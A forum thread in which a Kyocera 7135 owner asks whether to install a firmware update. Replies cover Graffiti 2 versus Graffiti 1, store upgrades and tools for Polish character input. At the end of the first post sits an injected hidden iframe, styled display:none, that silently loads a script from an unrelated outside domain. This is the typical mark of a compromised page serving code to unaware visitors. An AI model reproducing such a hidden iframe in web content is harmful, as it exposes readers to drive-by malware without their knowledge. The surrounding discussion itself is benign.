+ Reply to Thread
    pzc

Should I update to 29/44?

I did research the topics and could not find the answers so here are the questions.

My current rev is SZ 1.0.23 and MZ 1.0.36.

Is the latest rev 29/44?
    Should I update?
    How do I do that in Nashua, NH? Do I go to a VZ store or follow FAQ?

Thanks for the advise!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes you yould go to the verizon (or the provider that you may have) store to get the update.

If your phone is running stable then you should leave it alone.

If you want graffiti 2 then get the update, however there are posts on this board about how to keep graffiti 1.

I have the latest update on my phone and it does run more stable, but that is my opinion and there are others that have had problems.

There is a post on this board that discusses the update.http://ww2.e-places.net/~admin23/vbu...&threadid=7820

If you have been using G1 for any length of time, you will probably HATE G2. Any upgrade you do will result in G2 being added to your 7135 - they don't give you a choice.

Although there is a theory on restoring G1, I have not heard of anyone that has been successful at doing same.

I agree as above, it it ain't broke don't fix it.

pzc
    The update went very well at a local V store (Nashua, NH). Seems that 7135 is more stable now. However - although Graffiti 2 by itself is fine with me I did run into a wall with non-english character sets. See here:

http://www.smartphonesource.com/vbul...&threadid=8689

Upgrade depends

PZC, while this topic has been beat to death on another thread, I suggest that if you are satisfied with your current configuration leave it alone.

If you want G2 or have stability problems then get the upgrade.

I did my own upgrade and have found my phone to be more stable, my battery life is reduced and I installed JOT so I could go back to G1 strokes.

If you have the upgrade software follow the instructions posted on another thread and you should be okay. That said, I recommend getting any firmware upgrades done by your Verizon dealer. If the upgrade goes bad they will have to give you a new phone (or a refurb). If you zap your phone Verizon (or Kyocera) may not feel obligated to fix your phone for free.

IMHO, Bill
    bcottun

pzc
    Bcottun,

Thanks for your comments. My phone after the upgrade is definitely more stable – it simply does not crash any longer. I went to the local authorized store to get it done. I don’t know about the battery yet because where I live I only get an analog signal which kills any battery very fast. The only problem that I have (still no resolution) is that G2 and PiLoc (I use it for Polish alphabet) don’t like each other – I get hard resets!!! I wrote to the PiLoc developers and I’m waiting for an answer. For now no PiLoc for me. :anger :anger

Has anybody successfully returned to G1 under the new update? From what I’ve read here many tried but none succeeded. If you know how to do it, please point me in the right direction.

BTW, I love your Crash and PapaerClip utilities. They were extremely useful while identifying the problem with PiLoc. I also tried the alarm LED (forgot the name) but it does not engage the 7135 LED .

Can not go back to G1.

PZC, glad to hear your Verizon dealer could help. Not everyone has been as fortunate.

I have not heard of any successful regression from G2 to G1. The best I can suggest is check the 6th page of the best web browzer thread and go about half way down. Read the next few posts after the url. That will help you get Jot which will let you use the G1 strokes.

Bill
    bcottun

pzc
    Bcottun,

That would be great except I need to expand the character set to Central European alphabet (Polish) which Jot does not do. As far as I know only PiLoc does that

Originally posted by pzc
    Bcottun,

That would be great except I need to expand the character set to Central European alphabet (Polish) which Jot does not do. As far as I know only PiLoc does that
    Check into "TealScript". You can train nearly any characters any way you want.
    Michael

Symbolhack

PZC, I just started using Symbolhack.

"SymbolHack lets you quickly access hard-to-write symbols by popping-up a symbols window whenever the Keyboard is accessed. SymbolHack provides for a configurable symbols table and optional screen positioning for left-handed or right-handed users."

You can find it at
    http://store.yahoo.com/pilotgearsw/florentpillet.html. Shareware that costs $6.00.

I don't know if this will help you with your CE alphabet but it looks like you can train characters.

Bill
    bcottun